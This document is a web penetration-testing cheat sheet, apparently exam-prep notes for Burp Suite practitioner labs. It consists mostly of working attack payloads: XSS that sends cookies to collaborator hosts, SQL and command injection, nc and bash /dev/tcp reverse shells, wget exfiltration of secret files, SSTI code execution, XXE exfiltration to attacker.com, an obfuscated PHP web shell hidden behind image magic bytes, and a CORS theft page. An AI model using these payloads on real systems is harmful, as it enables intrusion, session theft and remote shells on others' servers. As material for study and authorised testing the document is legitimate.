Web VAPT Notes

Web

References:
https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
https://blog.gm7.org/ <- legend

Setting Up SOCKS Proxy in Burp Suite

1. In Burp Suite, go to Proxy → Proxy settings.

2. In the settings window, select User tab and go to Network → Connections.

3. In the SOCKS proxy section, enable “Override options for this project only”.

4. Fill in the proxy information:

   SOCKS proxy host: 127.0.0.1
   SOCKS proxy port: 9050
   

5. Check “Use SOCKS proxy”.

Directory Traversal

# Basic
/image?filename=/etc/passwd
/image?filename=..././..././..././etc/passwd

# Double URL-encode ../../../etc/passwd (use CyberChef)
%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c

# File path traversal, validation of start of path
/image?filename=/var/www/images/../../../../etc/passwd

# File path traversal, validation of file extension with null byte bypass
../../../../../../etc/passwd%00.jpg

Files of Interest

C:\boot.ini
C:\windows\win.ini
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\users\administrator\desktop\desktop.ini
C:\windows\repair\sam
c:\windows\system32\eula.txt
c:\windows\system32\license.rtf

# Password hashes
c:\WINDOWS\Repair\SAM
c:\WINDOWS\Repair\system

Cross-Site Scripting (XSS)

# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
# Generic XSS
<script>alert(1)</script>
<script>prompt(1)</script>
<script>confirm(1)</script>
<img src=x onerror=alert(/XSS/)>
<img src=x onerror=prompt(/XSS/)>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<script>document.write('<img src="http://burp.oastify.com?c='+document.cookie+'" />');</script>

# DOM XSS
"><script>document.location='http://burp.oastify.com/?c='+document.cookie</script>
<><img src=1 onerror="window.location='http://burp.oastify.com/c='+document.cookie"
<iframe src="https://kek.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">

# Reflected XSS into HTML context with most tags and attributes blocked
# Vanilla
<script>
location = 'https://kek.web-security-academy.net/?query=<body onload=document.location='https://burp.oastify.com/?c='+document.cookie tabindex=1>#x';
</script>
# URL encoded
<script>
location = 'https://kek.web-security-academy.net/?query=%3Cbody+onload%3Ddocument.location%3D%27https%3A%2F%2Fburp.oastify.com%2F%3Fc%3D%27%2Bdocument.cookie%20tabindex=1%3E#x';
</script>

# Reflected XSS with SVG
# Vanilla
<svg><animatetransform onbegin=document.location='https://burp.oastify.com/?c='+document.cookie;>
# URL encoded
%3Csvg%3E%3Canimatetransform%20onbegin=document.location='https://burp.oastify.com/?c='+document.cookie;%3E

# Useful Bypasses
</ScRiPt ><ScRiPt >document.write('<img src="http://burp.oastify.com?c='+document.cookie+'" />');</ScRiPt > 
# To CharCode Base 10
</ScRiPt ><ScRiPt >document.write(String.fromCharCode(60, 105, 109, 103, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 99, 51, 103, 102, 112, 53, 55, 56, 121, 56, 107, 51, 54, 109, 98, 102, 56, 112, 113, 120, 54, 113, 99, 50, 110, 116, 116, 107, 104, 97, 53, 122, 46, 111, 97, 115, 116, 105, 102, 121, 46, 99, 111, 109, 63, 99, 61) + document.cookie + String.fromCharCode(34, 32, 47, 62, 60, 47, 83, 99, 114, 105, 112, 116, 62));</ScRiPt >

SQL Injection (SQLi)

Injection Points

POST /?page=login[*] HTTP/1.1
Host: www.host.com[*]
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36[*]
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Server-Name: PROD[*]
Cookie: user=shiro[*]
Content-Type: application/x-www-form-urlencoded

username=shiro[*]&email=shiro@email.com[*]

If the data transmitted is in JSON format, remember to use double quotes \ maintain the JSON data structure. Other special format data are similar.

{"username":"test\""}

SQLi Payloads

'
')")
2*3
1/1
1/0
%%
' or 1=1 --
' or 1=2 --
' AND '1'='1
' AND '1'='2
' and sleep(5)
' waitfor delay '00:00:05' --
' (if 1=1) waitfor delay '00:00:05' --
' IF (LEN(DB_NAME())=6) WAITFOR DELAY '00:00:05' --
' IF (ASCII(lower(substring((DB_NAME()),1,1)))=116) WAITFOR DELAY '00:00:05' --
' ORDER BY 1--+
' UNION SELECT 1,2,3--+
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END) --
;SELECT CASE WHEN (1=1) THEN pg_sleep(7) ELSE pg_sleep(0) END--
'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END--
;SELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
{
  "uuid":"12345') UNION ALL SELECT NULL, NULL, @@version, NULL, NULL--",
  "token":"",
  ....
}

kali$ ghauri -r burp.txt -p user -level 3 -risk 3 -current-db -banner
kali$ sqlmap -r burp.txt 

Bypass Techniques

# Using Comments	
select/**/user();
select/*hahaha*/user();

# URL Encode Spaces	
+

# Other URL encoding (newline, Tab, etc.)	
%0d, %0a, %09, %0b,%a0

# Use parentheses. Parentheses are used to enclose subqueries. There can be no extra spaces on both ends of the parentheses.	
select(user())from(t_user);

# Use hexadecimal to bypass quotes
-- Original
select table_name from information_schema.tables where table_schema='test';
-- Hexadecimal
select table_name from information_schema.tables where table_schema=0x74657374;

# Use char to bypass quotes
-- Original
select table_name from information_schema.tables where table_schema='test';
-- Char
select table_name from information_schema.tables where table_schema=char(116,101,115,116);

Command Injection

# Generic Commands
`ping 127.0.0.1`
|id
&id
;id
|id;
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
echo <base64 encoode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 1337 >/tmp/f | sh"> | base64 -d | sh

# Blind OS command injection with time delays
email=x||ping+-c+10+127.0.0.1||

# Blind OS command injection with output redirection
email=||whoami>/var/www/images/output.txt||
filename=output.txt

# Blind OS command injection with OOB interaction
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

# Blind OS command injection with OOB data exfiltration
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

# Slightly advanced
https://website.com/image?image=/blog/posts/50.jpg&ImageSize="200||nslookup+$(cat+/home/carlos/secret).<collaborator>%26"  
https://website.com/image?ImgSize="`/usr/bin/wget%20--post-file%20/home/carlos/secret%20https://collaborator/`"

Server-Side Template Injection (SSTI)

# https://github.com/vladko312/SSTImap 
{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{{''.__class__.__base__.__subclasses__()}} # Search for Popen process, use payload below change 227 to index of Popen
{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
{{'a'.toUpperCase()}} 
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}} 

Host Header Attack

Host: exploit-server.com
X-Forwarded-Host: exploit-server.com
X-Host: exploit-server.com
X-Forwarded-Server: exploit-server.com
Host: localhost

# Double Host / Cache poisoning
Host: legit.net
Host: "></script><script>alert(document.cookie)</script>

XML External Entity (XXE) Injection

# OOB Interaction
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com"> %xxe; ]>

# Exfiltrate data
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

# XInclude to retrieve files
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

# Import XML
<?xml version="1.0" encoding="UTF-8"?>
<users>
    <user>
        <username>Example1</username>
        <email>example1@domain.com&`nslookup -q=cname $(cat /home/carlos/secret).burp.oastify.com`</email>
    </user>
</users>

File Upload Attacks

# Try to upload profile_img.php with the following payload
<?=eval(base64_decode('ZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXS4nIDI+JjEnKTs='));?>
# Then find the path to php and do /profile_img.php?cmd=<command>

# Change Content-Type from Content-Type : application/x-php or Content-Type : application/octet-stream to 
Content-Type : image/gif
Content-Type : image/gif
Content-Type : image/png
Content-Type : image/jpeg

# Double extensions
.jpg.php, .png.php

# Random uppercase and lowercase
.pHp, .pHP

# Null bytes
.php%00.jpg, .php\x00.jpg

# Special characters
.php%20, .php%0d%0a.jpg, .php%0a

Magic Bytes

# https://en.wikipedia.org/wiki/List_of_file_signatures

‰PNG␍␊␚␊
<?php echo system($_GET['cmd']); ?>
// or
ÿØÿî
<?php echo system($_GET['cmd']); ?>
// or
ÿØÿà
<?php echo system($_GET['cmd']); ?>
// or
ÿØÿà␀␐JFIF␀␁
<?php echo system($_GET['cmd']); ?>
// or
%PDF-
<?php echo system($_GET['cmd']); ?>
// or
GIF87a
<?php echo system($_GET['cmd']); ?>
// or
GIF89a
<?php echo system($_GET['cmd']); ?>

Malicious Filenames

test.jpg;sleep 10
test.jpg;sleep+10
test.jpg;sleep 10#
test.jpg;sleep 10%00
test.jpg|sleep 10
test.jpg%0Asleep 10
;sleep 10 test.jpg

# Reverse Shell
test.jpg;bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Server-Side Request Forgery (SSRF)

https://h.43z.one/ipconverter/

# SSRF against another back-end system
query_param=http://192.168.0.34:8080/admin

# Blind SSRF with OOB detection
Referer: http://burpcollaborator

# SSRF with whitelist-based input filter
query_param=http://localhost:80%2523@legit.website/admin/

# Download report as PDF SSRF
<iframe src='http://localhost:6566/secret' height='500' width='500'>

Broken Access Control

# Most Basic - Copy Admin URL and try with normal user

# Basic Path Manipulation
/admin
/Admin
/ADMIN
/./admin
/.;/admin
/;/admin
/admin/
/admin/.
/admin%0d
/admin%0a
/admin%0d%0a

# Changing Headers
Cookie: admin=true
Cookie: isAdmin=true
Cookie: access=1
Cookie: access=true
Cookie: session=<another_user_value>
Cookie: access_token=<another_user_value>

# IP Spoofing
Cluster-Client-IP: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Original-URL: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
Host: 127.0.0.1

# User Agent Spoof
User-Agent: <custom_user_agent>

# X-Original-URL, X-Rewrite-URL
POST / HTTP/1.1

...
X-Original-URL: /admin/deleteuser
# or
X-Rewrite-URL: /admin/deleteuser
...

username=<user>

# SSRF
https://example.com?url=https://admin.example.com/

Business Logic Exploits

# Fuzzing Paramters
productId=-1
productId=a
productId=
price=-1000
price=1000-
price=%1000
price=%-1000
email=super_long_email_here_...@attacker.com

# Removing Parameters
POST /change-password HTTP/1.1
...
# Remove 'current-password' parameter
username=admin&new-password-1=newpass&new-password-2=newpass

Cross-Origin Resource Sharing (CORS)

CORS is a mechanism that allows restricted resources on a web page to be requested from another domain outside the domain from which the first resource was served.

# Change Origin Value of Request Header
Origin: https://attacker.com
Origin: https://vulnerable.com.attacker.com
Origin: null

# Check if Response Allows Cross-Origin
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Origin: https://vulnerable.com.attacker.com
Access-Control-Allow-Origin: null

# Craft Malicious Web Page
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('GET', 'https://vulnerable.com/', true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location = '/log?key=' + this.responseText;
    }
</script>

Cross-Side Request Forgery (CSRF)

CSRF forces an end user to execute unexpected actions on a web application. It requires a cookie-based session handling.

# Eg vulnerable request
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=wiener@normal-user.com

# Right click the request -> Engagement Tools -> Generate CSRF PoC

# If need bruteforce login with CSRF token -> https://github.com/edoermini/CSRFBrute or https://systemweakness.com/cracking-the-code-advanced-csrf-token-validation-and-brute-force-attack-with-burpsuites-intruder-3a47226b097d

CSRF Bypass

Article Links: 1, 2, 3

Recursive Grep Technique

1. In the “Payload Positions” tab of the Intruder tool, specify where payloads should be injected within the request (vuln_parameter, csrf_parameter) and Select attack type “Pitchfork attack”.
2. Use BurpSuite’s “Grep - Extract” feature to automatically identify and extract CSRF tokens from responses.
3. For the csrf_parameter, use the recursive grep feature to get valid tokens. Set the initial payload to NULL.
4. In the Resource Pool section of BurpSuite, set the “Maximum Concurrent Requests (Threshold)” to 1.

Session Handling Technique

• Refer to article.

Parameter Mining

paramspider -d example.com